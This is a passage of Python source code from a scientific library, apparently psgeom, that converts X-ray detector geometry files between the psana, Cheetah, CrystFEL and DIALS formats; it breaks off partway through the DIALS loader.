psgeom import basisgrid\n\n\ndef _check_obj(obj):\n \"\"\"\n check that the object the a detector geometry is being loaded into is \"valid\"\n \"\"\"\n # NOT IMPLEMENTED\n return\n\n\ndef _natural_sort(l): \n convert = lambda text: int(text) if text.isdigit() else text.lower() \n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\n\n\n# ---- psana -------------------------------------------------------------------\n\n# define a \"type map\" that maps a list of known object identifier strings to\n# the corresponding types\n\ndef map_type(element_name, version=None):\n \n if version is None:\n try:\n version = int( re.search(r'V(\\d+)', element_name).group(1) )\n except:\n # most element's version 1 has no \"Vx\" string\n # will be \"MTRX:X1:Y1:X2:Y2\" instead of \"MTRX:Vx:X1:Y1:X2:Y2\"\n version = 1\n\n if element_name.startswith('SENS2X1'):\n element_type = sensors.Cspad2x1\n \n elif element_name.startswith('PNCCD'):\n element_type = sensors.PnccdQuad\n if version < 2:\n raise TypeError('psgeom v1.0+ requires PNCCD:V2+, got V%d' % version)\n \n elif element_name.startswith('MTRX'):\n if version >= 2:\n element_type = sensors.Mtrx\n elif version == 1:\n element_type = sensors.MtrxV1\n \n elif element_name.startswith('JUNGFRAU'):\n element_type = sensors.JungfrauSegment\n\n elif element_name.startswith('EPIX10KA'):\n element_type = sensors.Epix10kaSegment\n\n return element_type, element_name\n\n\n\ndef load_psana(obj, filename):\n \"\"\"\n Load a geometry in psana format.\n \n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n Returns\n -------\n root : detector.CompoundCamera\n The CompoundCamera instance\n \n References\n ----------\n ..[1] https://confluence.slac.stanford.edu/display/PSDM/Detector+Geometry\n \"\"\"\n \n _check_obj(obj)\n \n print('Loading: %s' % filename)\n\n # ---- load information into 2 tables: id_info (names) & trt (data)\n\n # types/names and id numbers -- unique name is 2 fields\n id_info = np.genfromtxt(filename, dtype=np.str, \n usecols=(0,1,2,3), autostrip=True)\n #print(id_info)\n\n # translation & rotation table (trt)\n trt = np.genfromtxt(filename, dtype=np.float64, usecols=list(range(4,13)), autostrip=True)\n assert trt.shape[1] == 9\n translations = trt[:,0:3]\n rotations = trt[:,3:6] + trt[:,6:9] # just combine rotations & tilts\n\n n_rows = len(id_info)\n assert trt.shape[0] == n_rows, 'name/data rows dont match (%d/%d)' % \\\n (trt.shape[0], n_rows)\n\n\n # ---- find the root of the tree, not to be guarenteed first line\n possible_root_rows = list(range(n_rows)) # elimination\n\n for i in range(n_rows):\n for j in range(n_rows):\n \n # check to see if row i is listed as a child anywhere\n if (id_info[i][0], id_info[i][1]) == (id_info[j][2], id_info[j][3]):\n \n # if so, we know row i is not a root\n #print \"%d is child in row %d\" % (i,j)\n if i in possible_root_rows:\n possible_root_rows.remove(i)\n \n \n # check to make sure we have only a single root\n if len(possible_root_rows) != 1:\n raise IOError('Ambiguous tree structure in geometry file. '\n '%d roots found.' % len(possible_root_rows))\n else:\n root_index = possible_root_rows[0]\n #if id_info[root_index][0] != 'IP':\n # warnings.warn('Root object is not labeled \"IP\".')\n \n\n # ---- traverse tree, adding children / depth frist\n\n def add_to_tree(current_node_index, parent=None):\n \n cni = current_node_index # shorthand\n cid = (id_info[cni][2], id_info[cni][3])\n \n child_indices = []\n for i in range(n_rows):\n if (id_info[i][0], id_info[i][1]) == cid:\n child_indices.append(i)\n #print '%d --> %s' % (cni, child_indices)\n \n\n # > if no children, is a SensorElement\n if len(child_indices) == 0:\n\n # following commented lines deprecated \n # loop up what type of sensor element we have\n #try:\n # typ = sensors.type_map[id_info[cni][2]]\n #except KeyError:\n # raise KeyError('Sensor type: %s not understood.' % id_info[i][2])\n\n typ, name = map_type(id_info[cni][2])\n \n # TJL note to self:\n # this next line could be problematic if we don't restrict\n # the __init__ method of SensorElements.....\n \n curr = typ.from_type(type_name=name,\n id_num=int(id_info[cni][3]),\n parent=parent,\n rotation_angles=rotations[cni], \n translation=translations[cni])\n \n # > else, is a CompoundCamera\n else:\n curr = obj(type_name=id_info[cni][2],\n id_num=int(id_info[cni][3]),\n parent=parent,\n rotation_angles=rotations[cni], \n translation=translations[cni])\n \n for c in child_indices:\n _ = add_to_tree(c, parent=curr)\n \n # we discard all intermediate results, only root is left\n return curr\n \n root_object = add_to_tree(root_index, parent=None)\n\n return root_object\n \n \ndef _mikhail_ordering(list_of_lines):\n \"\"\"\n for legacy! aka, hopefully we can remove this confusing code soon...\n \"\"\"\n \n # ordering we're going for starts with all the sensor elements, followed\n # by the quads, followed by whatever else\n \n # assume that the ordering we're dealing with is depth-first\n \n sensors = []\n quads = []\n other = []\n root = []\n \n for line in list_of_lines:\n if 'QUAD' in line[16:]:\n quads.append(line)\n elif 'SENS' in line[16:]:\n sensors.append(line)\n elif 'root' in line[16:]:\n root.append(line)\n else:\n other.append(line)\n \n ordered_list = sensors + quads + other + root\n \n assert len(ordered_list) == len(list_of_lines)\n for e in list_of_lines:\n assert e in ordered_list\n \n return ordered_list\n \n \n \ndef write_psana(detector, filename, title='geometry'):\n \"\"\"\n Write a geometry in psana format.\n\n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n References\n ----------\n ..[1] https://confluence.slac.stanford.edu/display/PSDM/Detector+Geometry\n \"\"\"\n \n f = open(filename, 'w')\n \n # write a header\n author = getpass.getuser()\n today = datetime.date.today()\n date = '%d-%d-%d' % (today.month, today.day, today.year)\n time = datetime.datetime.now().time().isoformat()\n\n header = \"\"\"\n# TITLE %s\n# AUTHOR %s\n# CALIB_TYPE geometry\n# COMMENT:01 WRITTEN BY USER \n# DATE_TIME %s\\t%s\n# PARAM:01 PARENT - name and version of the parent object\n# PARAM:02 PARENT_IND - index of the parent object\n# PARAM:03 OBJECT - name and version of the object\n# PARAM:04 OBJECT_IND - index of the new object\n# PARAM:05 X0 - x-coordinate [um] of the object origin in the parent frame\n# PARAM:06 Y0 - y-coordinate [um] of the object origin in the parent frame\n# PARAM:07 Z0 - z-coordinate [um] of the object origin in the parent frame\n# PARAM:08 ROT_Z - object design rotation angle [deg] around Z axis of the parent frame\n# PARAM:09 ROT_Y - object design rotation angle [deg] around Y axis of the parent frame\n# PARAM:10 ROT_X - object design rotation angle [deg] around X axis of the parent frame\n# PARAM:11 TILT_Z - object tilt angle [deg] around Z axis of the parent frame\n# PARAM:12 TILT_Y - object tilt angle [deg] around Y axis of the parent frame\n# PARAM:13 TILT_X - object tilt angle [deg] around X axis of the parent frame\n# HDR PARENT IND OBJECT IND X0[um] Y0[um] Z0[um] ROT-Z ROT-Y ROT-X TILT-Z TILT-Y TILT-X\n\"\"\" % (title, author, date, time)\n\n f.write(header + '\\n')\n\n lines = [] # container for data lines\n\n fmt_line = '%12s %4d %12s %4d' + ' %12.6f'*9 + '\\n'\n\n dist = detector.xyz.flatten()[2]\n\n # write a line for the root node\n root_data = ['IP', 0, detector.type_name, detector.id] + [0.0]*2 + [dist] + [0.0]*6\n root_line = fmt_line % tuple(root_data)\n \n lines.append(root_line)\n\n # write a line for each child node in the CompoundCamera tree\n def write_children(node):\n \n if hasattr(node, 'children'):\n \n for child in node.children:\n child_data = [node.type_name,\n node.id,\n child.type_name,\n child.id]\n child_data += list(child.translation)\n child_data += list(child.rotation_angles)\n child_data += [0.0]*3\n \n assert len(child_data) == 13\n \n # Set all child z position to 0\n child_data[6] = 0\n\n line = fmt_line % tuple(child_data)\n lines.append(line)\n \n write_children(child)\n\n write_children(detector)\n \n # temporary -- for compatability with legacy code -- todo\n # flip the ordering of the lines so that the sensor elements come first,\n # as a lot of existing code requires this ordering\n for l in _mikhail_ordering(lines):\n f.write(l)\n\n f.close()\n \n return\n \n\n# ---- cheetah -----------------------------------------------------------------\n \n \ndef _cheetah_to_asics(cheetah_image):\n \n new_image = np.zeros((4,16,185,194), dtype=cheetah_image.dtype)\n \n shape = (185, 388)\n \n num_quads = int(cheetah_image.shape[1] / shape[1])\n if cheetah_image.shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_image.shape))\n \n num_twoXones = int(cheetah_image.shape[0] / shape[0])\n if cheetah_image.shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' % str(cheetah_image.shape))\n \n for q in range(num_quads):\n for twoXone in range(num_twoXones):\n \n x_start = 388 * q\n x_stop = 388 * (q+1)\n \n y_start = 185 * twoXone\n y_stop = 185 * (twoXone + 1)\n \n sec1, sec2 = np.hsplit(cheetah_image[y_start:y_stop,\n x_start:x_stop], 2)\n \n new_image[q,twoXone*2,:,:] = sec1\n new_image[q,twoXone*2+1,:,:] = sec2\n \n \n return new_image\n \n \ndef _cheetah_to_twobyones(cheetah_image):\n \n shape = (185, 388)\n \n num_quads = int(cheetah_image.shape[1] / shape[1])\n if cheetah_image.shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_image.shape))\n \n num_twoXones = int(cheetah_image.shape[0] / shape[0])\n if cheetah_image.shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' % str(cheetah_image.shape))\n \n new_image = np.zeros((num_quads*num_twoXones,185,388), \n dtype=cheetah_image.dtype)\n \n for q in range(num_quads):\n for twoXone in range(num_twoXones):\n \n x_start = 388 * q\n x_stop = 388 * (q+1)\n \n y_start = 185 * twoXone\n y_stop = 185 * (twoXone + 1)\n \n new_image[q*8 + twoXone,:,:] = cheetah_image[y_start:y_stop,\n x_start:x_stop]\n \n return new_image\n \n \ndef load_cheetah(obj, filename, pixel_size=109.92, element_type=sensors.Mtrx):\n \"\"\"\n Load a geometry in cheetah format.\n \n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n Returns\n -------\n root : camera.Cspad\n The Cspad instance\n \"\"\"\n \n _check_obj(obj)\n\n f = h5py.File(filename, 'r')\n\n if not list(f.keys()) == ['x', 'y', 'z']:\n raise IOError('File: %s is not a valid pixel map, should contain fields'\n ' [\"x\", \"y\", \"z\"] exlusively' % filename)\n\n cheetah_shape = f['x'].shape\n\n # convert m --> um, ends up not mattering tho...\n # also flip the sign of x : cheetah uses +x away from hutch door\n x = -1.0 * _cheetah_to_asics( np.array(f['x']) * 1000000.0 )\n y = _cheetah_to_asics( np.array(f['y']) * 1000000.0 )\n\n # for some reason z is in microns, so leave it\n z = _cheetah_to_asics( np.array(f['z']) )\n\n f.close()\n\n bg = basisgrid.BasisGrid()\n shape = (185, 388) # will always be this for each asic\n \n # find out how many quads/asics we expect based on the size of the maps\n # we need this logic here to deal with both big and 2x2 CSPADs\n num_quads = int(cheetah_shape[1] / shape[1])\n if cheetah_shape[1] % shape[1] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of quads.' % str(cheetah_shape))\n \n num_asics = int(cheetah_shape[0] / shape[0]) * 2\n if cheetah_shape[0] % shape[0] != 0:\n raise IOError('Unexpected geometry array shape: %s. Could not infer '\n 'number of two-by-ones.' % str(cheetah_shape))\n\n # loop over each asic, and convert it into a basis grid\n for i in range(num_quads):\n for j in range(num_asics):\n\n # extract all the corner positions (code ineligant but explicit)\n # corners are numbered 0 -> 4, starting top left and continuing cw\n corners = np.zeros(( 4, 3 ))\n corners[0,:] = ( x[i,j,0,0], y[i,j,0,0], z[i,j,0,0] )\n corners[1,:] = ( x[i,j,0,-1], y[i,j,0,-1], z[i,j,0,-1] )\n corners[2,:] = ( x[i,j,-1,-1], y[i,j,-1,-1], z[i,j,-1,-1] )\n corners[3,:] = ( x[i,j,-1,0], y[i,j,-1,0], z[i,j,-1,0] )\n\n # average the vectors formed by the corners to find f/s vects\n # the fast scan direction is the last index, s is next\n # f points left -> right, s points bottom -> top\n f = (( corners[1,:] - corners[0,:] ) + ( corners[2,:] - corners[3,:] ))\n s = (( corners[3,:] - corners[0,:] ) + ( corners[2,:] - corners[1,:] ))\n\n # make them pixel-size magnitude\n f = f * (pixel_size / np.linalg.norm(f))\n s = s * (pixel_size / np.linalg.norm(s))\n \n # p is just location of 1st pixel in memory, which is our 1st corner\n p = corners[0,:]\n bg.add_grid(p, s, f, shape)\n \n geom_instance = obj.from_basisgrid(bg, element_type=element_type)\n \n return geom_instance\n\n\ndef write_cheetah(detector, filename=\"pixelmap-cheetah-raw.h5\"):\n \"\"\"\n Write a geometry in cheetah format.\n\n Parameters\n ----------\n detector : camera.Cspad\n \n filename : str\n The path of the file on disk.\n \"\"\"\n\n coordinates = ['x', 'y', 'z']\n \n if not hasattr(detector, 'xyz'):\n raise TypeError('passed `detector` object must have an xyz attr')\n\n pp = np.squeeze(detector.xyz)\n if pp.shape == (4, 8, 185, 388, 3):\n num_quads = 4\n num_twoXones = 8\n elif pp.shape == (2, 185, 388, 3):\n num_quads = 1\n num_twoXones = 2\n pp = pp.reshape(1, 2, 185, 388, 3) # dummy quad axis\n else:\n raise ValueError('Geometry does not appear to be a CSPAD. xyz '\n 'shape: %s' % str(pp.shape))\n\n # write an h5\n f = h5py.File(filename, 'w')\n\n # iterate over x/y/z\n for xyz in range(len(coordinates)):\n\n cheetah_image = np.zeros((1480, 1552), dtype=np.float32)\n\n # iterate over each 2x1/quad (note switch)\n for q in range(num_quads):\n for a in range(num_twoXones): # which 2x1\n\n x_start = 388 * q\n x_stop = 388 * (q+1)\n\n y_start = 185 * a\n y_stop = 185 * (a + 1)\n\n # if x axis, flip sign\n # unless z axis, convert um --> m ; z-axis in cheetah is in um\n if xyz == 0:\n unit_factor = - 1.0 / 1000000.0\n elif xyz == 1:\n unit_factor = 1.0 / 1000000.0\n elif xyz == 2:\n unit_factor = 1.0\n \n cheetah_image[y_start:y_stop,x_start:x_stop] = unit_factor * pp[q,a,:,:,xyz]\n\n\n f['/%s' % coordinates[xyz]] = cheetah_image\n\n f.close()\n\n return\n \n\n# ---- crystfel --------------------------------------------------------------- \n\ndef load_crystfel(obj, filename, element_type=sensors.Mtrx, verbose=True):\n \"\"\"\n Convert a CrystFEL geom file to a Cspad object.\n \n NOTE ON UNITS: all CrystFEL units are pixel units, except the\n sample-to-detector offset, which is typically in meters.\n \n \n Parameters\n ----------\n filename : str\n The path of the file on disk.\n \n Returns\n -------\n root : camera.Cspad\n The Cspad instance\n \"\"\"\n \n _check_obj(obj)\n \n # NOTE ON UNITS: all CrystFEL units are pixel units, except the\n # sample-to-detector offset\n \n if not filename.endswith('.geom'):\n raise IOError('Can only read flat text files with extension `.geom`.'\n ' Got: %s' % filename)\n\n if verbose:\n print(\"Converting geometry in: %s ...\" % filename)\n \n f = open(filename, 'r')\n geom_txt = f.read()\n f.close()\n\n\n bg = basisgrid.BasisGrid()\n\n\n # measure the absolute detector offset\n re_pz_global = re.search(r'\\ncoffset\\s+=\\s+(\\d+.\\d+)', geom_txt) \n if re_pz_global == None:\n print(\"WARNING: Could not find `coffset` field, defaulting z-offset to 0.0\")\n p_z_global = 0.0\n else:\n p_z_global = float(re_pz_global.group(1)) * 1e6 # m --> micron\n if verbose:\n print('Found global z-offset (coffset): %f' % p_z_global)\n\n\n # figure out the pixel size\n re_pixel_size = re.search(r'\\nres\\s+=\\s+(\\d+.\\d+)', geom_txt) \n if re_pixel_size == None:\n pixel_size = None\n else:\n pixel_size = 1e6 / float(re_pixel_size.group(1)) # m --> micron\n if verbose:\n print('Found pixel size (res) [micron]: %f' % pixel_size)\n \n \n # find out which panels we have to look for\n # > try to do this in a general way by looking at the unique set of items\n # > with a corner field \n panels = re.findall(r'(\\S+)/corner', geom_txt)\n panels = _natural_sort(list(set( panels )))\n \n if len(panels) == 0:\n raise IOError('Could not find any panels in file: %s' % filename)\n \n # iterate over each quad / ASIC \n for panel in panels:\n\n if verbose:\n print(\"Reading geometry for: %s\" % panel)\n\n try:\n \n # get pixel size on a per-panel basis\n if pixel_size is None:\n re_pixel_size = re.search(r'%s/res\\s+=\\s+(\\d+.\\d+)' % panel, geom_txt) \n if re_pixel_size == None:\n raise IOError('could not find required `res` field in file')\n else:\n pixel_size = 1e6 / float(re_pixel_size.group(1)) # m -> um\n if verbose:\n print(('Found pixel size for panel %s (res) [micron]: '\n '%f' % (panel, pixel_size)))\n \n\n # match f/s vectors (TODO probably should make this a fxn)\n # fs\n re_fs_x = re.search(r'%s/fs\\s+=.*?((.)?\\d+.\\d+)x' % panel, geom_txt)\n re_fs_y = re.search(r'%s/fs\\s+=.*?((.)?\\d+.\\d+)y' % panel, geom_txt)\n\n if (re_fs_x is None) and (re_fs_y is None):\n raise IOError('could not find valid ``%s/fs`` field' % panel)\n\n if re_fs_x is None:\n f_x = 0.0\n else:\n f_x = - float( re_fs_x.group(1) )\n \n if re_fs_y is None:\n f_y = 0.0\n else:\n f_y = float( re_fs_y.group(1) )\n \n f = np.array([f_x, f_y, 0.0])\n f = f * (pixel_size / np.linalg.norm(f))\n \n # ss\n re_ss_x = re.search(r'%s/ss\\s+=.*?((.)?\\d+.\\d+)x' % panel, geom_txt)\n re_ss_y = re.search(r'%s/ss\\s+=.*?((.)?\\d+.\\d+)y' % panel, geom_txt)\n\n if (re_ss_x is None) and (re_ss_y is None):\n raise IOError('could not find valid ``%s/ss`` field' % panel)\n\n if re_ss_x is None:\n s_x = 0.0\n else:\n s_x = - float( re_ss_x.group(1) )\n \n if re_ss_y is None:\n s_y = 0.0\n else:\n s_y = float( re_ss_y.group(1) )\n \n s = np.array([s_x, s_y, 0.0])\n s = s * (pixel_size / np.linalg.norm(s))\n \n \n # min_fs & min_ss\n re_min_fs = re.search(r'%s/min_fs = (\\d+)' % panel, geom_txt)\n re_max_fs = re.search(r'%s/max_fs = (\\d+)' % panel, geom_txt)\n \n re_min_ss = re.search(r'%s/min_ss = (\\d+)' % panel, geom_txt)\n re_max_ss = re.search(r'%s/max_ss = (\\d+)' % panel, geom_txt)\n \n shp = ( np.abs(int(re_max_ss.group(1)) - int(re_min_ss.group(1))) + 1, \n np.abs(int(re_max_fs.group(1)) - int(re_min_fs.group(1))) + 1)\n\n sf_angle = np.degrees( np.arccos( np.dot(s, f) / np.square(pixel_size) ) )\n\n print(panel, sf_angle)\n \n except AttributeError as e:\n print(e)\n raise IOError('Geometry file incomplete -- cant parse one or '\n 'more basis vector fields (ss/fs) for panel: %s' % panel)\n\n # match corner postions, that become the p vector\n # note we have to convert from pixel units to mm\n # and also that CrystFEL measures the corner from the actual\n # *corner*, and not the center of the corner pixel!\n \n # also, remember the s[0] and f[0] have already been x-flipped\n \n try:\n \n re_cx = re.search(r'%s/corner_x\\s+=\\s+((.)?\\d+(.\\d+)?)' % panel, geom_txt)\n p_x = - float( re_cx.group(1) ) * pixel_size + 0.5 * (s[0] + f[0])\n\n re_cy = re.search(r'%s/corner_y\\s+=\\s+((.)?\\d+(.\\d+)?)' % panel, geom_txt)\n p_y = float( re_cy.group(1) ) * pixel_size + 0.5 * (s[1] + f[1])\n \n \n # it's allowed to also have individual z-offsets for\n # each panel, so look for those (CrystFEL units: meters) \n re_cz = re.search(r'%s/coffset\\s+=\\s+((.)?\\d+.\\d+)' % panel, geom_txt)\n if re_cz == None:\n if verbose:\n print('Could not find z data for %s' % panel)\n p_z = p_z_global \n else:\n # add to the global offset\n p_z = p_z_global + float( re_cz.group(1) ) * 1e6 # m --> micron\n\n p = np.array([p_x, p_y, p_z])\n\n except AttributeError as e:\n print(e)\n raise IOError('Geometry file incomplete -- cant parse one or '\n 'more corner fields for panel: %s' % panel)\n\n # finally, add the ASIC to the basis grid\n bg.add_grid(p, s, f, shp)\n\n if verbose:\n print(\" ... successfully converted geometry.\")\n \n geom_instance = obj.from_basisgrid(bg, element_type=element_type)\n \n return geom_instance\n \n\ndef write_generic_crystfel(detector, filename, coffset=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n detector : camera.CompoundAreaCamera\n The detector geometry to write to disk\n \n filname : str\n The name of file to write. Should end in '.geom'\n\n coffset: float\n Detector home position to sample distance in metres. \n When coffset is None, coffset is set to detector distance.\n \"\"\"\n \n bg = detector.to_basisgrid()\n \n def get_sign(v):\n if v >= 0:\n s = '+'\n else:\n s = '-'\n return s\n\n with open(filename, 'w') as of:\n \n of.write(\"; This file contains a geometry generated by psgeom\\n\")\n of.write(\"; https://github.com/slaclab/psgeom\\n\")\n \n of.write(generic_header + '\\n')\n \n if 'maskfile' in kwargs: \n of.write('mask_file = ' + str(kwargs['maskfile']) + '\\n')\n of.write('mask = /entry_1/data_1/mask\\n')\n of.write('mask_good = 0x0000\\n')\n of.write('mask_bad = 0xffff\\n')\n else:\n of.write('; mask = /entry_1/data_1/mask\\n')\n of.write('; mask_good = 0x0000\\n')\n of.write('; mask_bad = 0xffff\\n')\n of.write('\\n')\n\n # remember: cheetah data is flattened along the slowest dimension\n # so that (n_elements, slow, fast) --> (n_elements * slow, fast)\n # this final 2d array is called \"the slab\"\n\n grid_index = 0 # count the basisgrid we are on\n ss_slab_pos = 0 # the slow index of \"the slab\"\n\n for leaf_index, leaf in enumerate(detector.leaves):\n\n sp_shape = leaf.subpanel_shape\n for sp_ss_index in range(sp_shape[0]):\n for sp_fs_index in range(sp_shape[1]):\n\n subpanel_index = sp_ss_index * sp_shape[1] + sp_fs_index\n\n p, s, f, sp = bg.get_grid(grid_index)\n panel_name = \"p%da%d\" % (leaf_index, subpanel_index)\n \n # write the basis vectors \n f_sqt = math.sqrt(f[0]**2 + f[1]**2)\n s_sqt = math.sqrt(s[0]**2 + s[1]**2)\n\n pixel_size = f_sqt\n \n of.write(\"%s/fs = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-f[0]/f_sqt), abs(f[0]/f_sqt), \n get_sign( f[1]/f_sqt), abs(f[1]/f_sqt) ))\n of.write(\"%s/ss = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-s[0]/s_sqt), abs(s[0]/s_sqt), \n get_sign( s[1]/s_sqt), abs(s[1]/s_sqt) ))\n of.write(\"%s/res = %.3f\\n\" % (panel_name, 1e6 / pixel_size)) # um --> m\n \n # write the corner positions\n tagcx = \"%s/corner_x\" % panel_name\n tagcy = \"%s/corner_y\" % panel_name\n tagcz = \"%s/coffset\" % panel_name\n \n # CrystFEL measures the corner from the actual *corner*, and not\n # the center of the corner pixel (dont forget to x-flip s[0], f[0])\n \n cx = - float(p[0])/pixel_size + 0.5 * (f[0] + s[0])/pixel_size\n cy = float(p[1])/pixel_size - 0.5 * (f[1] + s[1])/pixel_size\n \n of.write(\"%s = %f\\n\" % (tagcx, cx))\n of.write(\"%s = %f\\n\" % (tagcy, cy))\n\n # the z-axis is in *** meters ***\n if coffset is None:\n dist = float(p[2]) / 1e6\n else:\n dist = coffset\n of.write(\"%s = %f\\n\" % (tagcz, dist))\n\n # combine leaf & slow axes\n # note : sp here is just the shape of the basis grid\n # note : sp_ss_index/sp_fs_index is where we are in the subpanel\n # note : fs/ss indices are INCLUSIVE\n\n of.write(\"%s/min_fs = %d\\n\" % (panel_name, sp[1] * sp_fs_index ))\n of.write(\"%s/max_fs = %d\\n\" % (panel_name, sp[1] * (1 + sp_fs_index) - 1))\n\n # ss_slab_pos is incremented below, outside this loop\n of.write(\"%s/min_ss = %d\\n\" % (panel_name, ss_slab_pos))\n of.write(\"%s/max_ss = %d\\n\" % (panel_name, ss_slab_pos + sp[0] - 1))\n \n # this tells CrystFEL to use this panel\n of.write(\"%s/no_index = 0\\n\" % panel_name)\n \n of.write(\"\\n\") # new line\n\n grid_index += 1\n\n # // end fs for loop\n ss_slab_pos += sp[0]\n\n # // end ss for loop\n # // end leaves for loop\n # // end with open(...) statement\n\n # make sure things add up :)\n assert grid_index == bg.num_grids, grid_index\n \n return\n\n\ndef write_cspad_crystfel(detector, filename, coffset=None, intensity_file_type='cheetah',\n pixel_size=109.92, **kwargs):\n \"\"\"\n Write a CSPAD geometry to disk in CrystFEL format. Note that some fields\n will be written but left blank -- these are fields you probably should\n fill in before performing any computations in CrystFEL, but are information\n that psgeom has no handle on (e.g. detector gain).\n \n Thanks to Rick Kirian & Tom White for assistance with this function.\n \n Parameters\n ----------\n detector : cspad.CSPad\n The detector geometry to write to disk\n \n filname : str\n The name of file to write. Should end in '.geom'\n \n coffset: float\n Detector home position to sample distance in metres.\n When coffset is None, coffset is set to detector distance.\n \n Optional Parameters\n -------------------\n intensity_file_type : str, {'cheetah'}\n The kind of file this geometry file will be used with. Necessary to tell\n CrystFEL how intensity data map onto the detector\n\n pixel_size : float\n Pixel size in microns\n\n maskfile : str\n Hdf5 filename of a mask used to indexing and integration by CrystFEL.\n \"\"\"\n \n bg = detector.to_basisgrid()\n \n def get_sign(v):\n if v >= 0:\n s = '+'\n else:\n s = '-'\n return s\n \n \n if intensity_file_type == 'cheetah':\n \n # this is complex, so I went the lazy route and copied an\n # existing file\n intensity_map = crystfel_cheetah_intensities.split('-')\n assert len(intensity_map) == 64\n \n else:\n raise ValueError('Cannot write geometries for '\n '`intensity_file_type`: %s, only currently '\n 'have implemented writers for '\n '{\"cheetah\"}' % intensity_file_type)\n \n \n \n with open(filename, 'w') as of:\n \n of.write(\"; This file contains a CSPAD geometry generated by psgeom\\n\")\n of.write(\"; https://github.com/slaclab/psgeom\\n\")\n\n if coffset is None:\n of.write(cspad_header_noClen + '\\n')\n else:\n of.write(cspad_header + '\\n')\n\n if 'maskfile' in kwargs: \n of.write('mask_file = ' + str(kwargs['maskfile']) + '\\n')\n of.write('mask = /entry_1/data_1/mask\\n')\n of.write('mask_good = 0x0000\\n')\n of.write('mask_bad = 0xffff\\n')\n else:\n of.write('; mask = /entry_1/data_1/mask\\n')\n of.write('; mask_good = 0x0000\\n')\n of.write('; mask_bad = 0xffff\\n')\n\n of.write(cspad_groups + '\\n')\n \n # iterate over each basis grid object\n # for a full CSPAD, this will be 64 elements\n # for a 2x2, it will be 4 elements and the \"quad\" will always be 0\n for grid_index in range(bg.num_grids):\n \n asic = grid_index % 16\n quad = grid_index / 16\n \n p, s, f, sp = bg.get_grid(grid_index)\n\n panel_name = \"q%da%d\" % (quad, asic)\n \n # tell crystFEL how read intensity values in a file\n of.write(intensity_map[grid_index].strip() + '\\n')\n \n # write the basis vectors \n sqt = math.sqrt(f[0]**2 + f[1]**2) \n of.write(\"%s/fs = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-f[0]/sqt), abs(f[0]/sqt), \n get_sign( f[1]/sqt), abs(f[1]/sqt) ))\n sqt = math.sqrt(s[0]**2 + s[1]**2)\n of.write(\"%s/ss = %s%fx %s%fy\\n\" % ( panel_name,\n get_sign(-s[0]/sqt), abs(s[0]/sqt), \n get_sign( s[1]/sqt), abs(s[1]/sqt) ))\n \n # write the corner positions\n tagcx = \"%s/corner_x\" % panel_name\n tagcy = \"%s/corner_y\" % panel_name\n tagcz = \"%s/coffset\" % panel_name\n \n # CrystFEL measures the corner from the actual *corner*, and not\n # the center of the corner pixel (dont forget to x-flip s[0], f[0])\n \n cx = - float(p[0])/pixel_size + 0.5 * (f[0] + s[0])/pixel_size\n cy = float(p[1])/pixel_size - 0.5 * (f[1] + s[1])/pixel_size\n \n of.write(\"%s = %f\\n\" % (tagcx, cx))\n of.write(\"%s = %f\\n\" % (tagcy, cy))\n \n # the z-axis is in *** meters ***\n if coffset is None:\n dist = float(p[2]) / 1e6\n else:\n dist = coffset\n of.write(\"%s = %f\\n\" % (tagcz, dist ))\n \n # this tells CrystFEL to use this panel\n of.write(\"%s/no_index = 0\\n\" % panel_name)\n \n of.write(\"\\n\") # new line\n \n return \n\n# ---- DIALS -------------------------------------------------------------------\n\n\ndef load_dials(obj, filename, scale_factor=1000.0):\n \"\"\"\n Load a geometry in DIALS format.\n \n Parameters\n ----------\n obj : camera.CompoundAreaCamera\n An instance of CompoundAreaCamera or a subclass of it\n\n filename : str\n The path of the file on disk.\n\n scale_factor : float\n A factor to scale the units by (to e.g. meet a new convention for units)\n \n Returns\n -------\n obj : variable\n A populated instance of the camera object\n \"\"\"\n\n with open(filename, 'r') as f:\n jo = json.load(f)\n\n d = jo[\"detector\"]\n if len(d) != 1:\n raise NotImplementedError('multiple detectors in json')\n else:\n base = jo[\"detector\"][0]\n\n to_visit = []\n bg_tmp = {}\n\n def get_F(node):\n \n # see Acta Cryst. D (2018). D74, 877-894 eqs (1) & (2)\n\n dx = np.array(node[\"fast_axis\"]) # x = fast\n dy = np.array(node[\"slow_axis\"]) # y = slow\n dn = np.cross(dx, dy) # dn = dx x dy\n d0 = np.array(node[\"origin\"]) \n F = np.array([dx, dy, dn, d0]).T\n F = np.vstack([F, np.array([0, 0, 0, 1])])\n\n return F\n\n def dfs(current_node, cF):\n\n # the geometry file is separated into two parts, first a\n # 'hierarchy' that specifies the translations/rotations\n # and points to a 'panel' index\n #\n # the second part is the 'panels', which are the leaves\n # of the hierarchy, but are located in a different part\n # of the JSON file -- these have one final trans/rot to\n # apply\n\n if \"children\" in list(current_node.keys()):\n for i in range(len(current_node[\"children\"])):\n new_node = (current_node[\"children\"][i],\n np.dot(cF, get_F(current_node)) )\n to_visit.append( new_node )\n\n if \"panel\" in list(current_node.keys()):\n panel_index = current_node[\"panel\"]\n panel = base[\"panels\"][panel_index]\n #print \"adding panel:\", panel_index\n\n px_size = np.array(panel[\"pixel_size\"])\n shp = np.array(panel[\"image_size\"])\n\n pF = get_F(panel)\n final_F = np.dot(cF, pF)\n\n # extract the final (transformed) panel vectors\n p = final_F[:3,3] * scale_factor\n s = final_F[:3,1] * px_size[1] * scale_factor\n f = final_F[:3,0] * px_size[0] * scale_factor\n\n # DIAS convention is +z points from IP to source\n # this is the x-flipped version of our convention\n p[0] *= -1\n s[0] *= -1\n f[0] *= -1\n\n #bg.add_grid(p, s, f, shp)\n bg_tmp[panel_index] = (p, s, f, shp)\n\n if len(to_visit) > 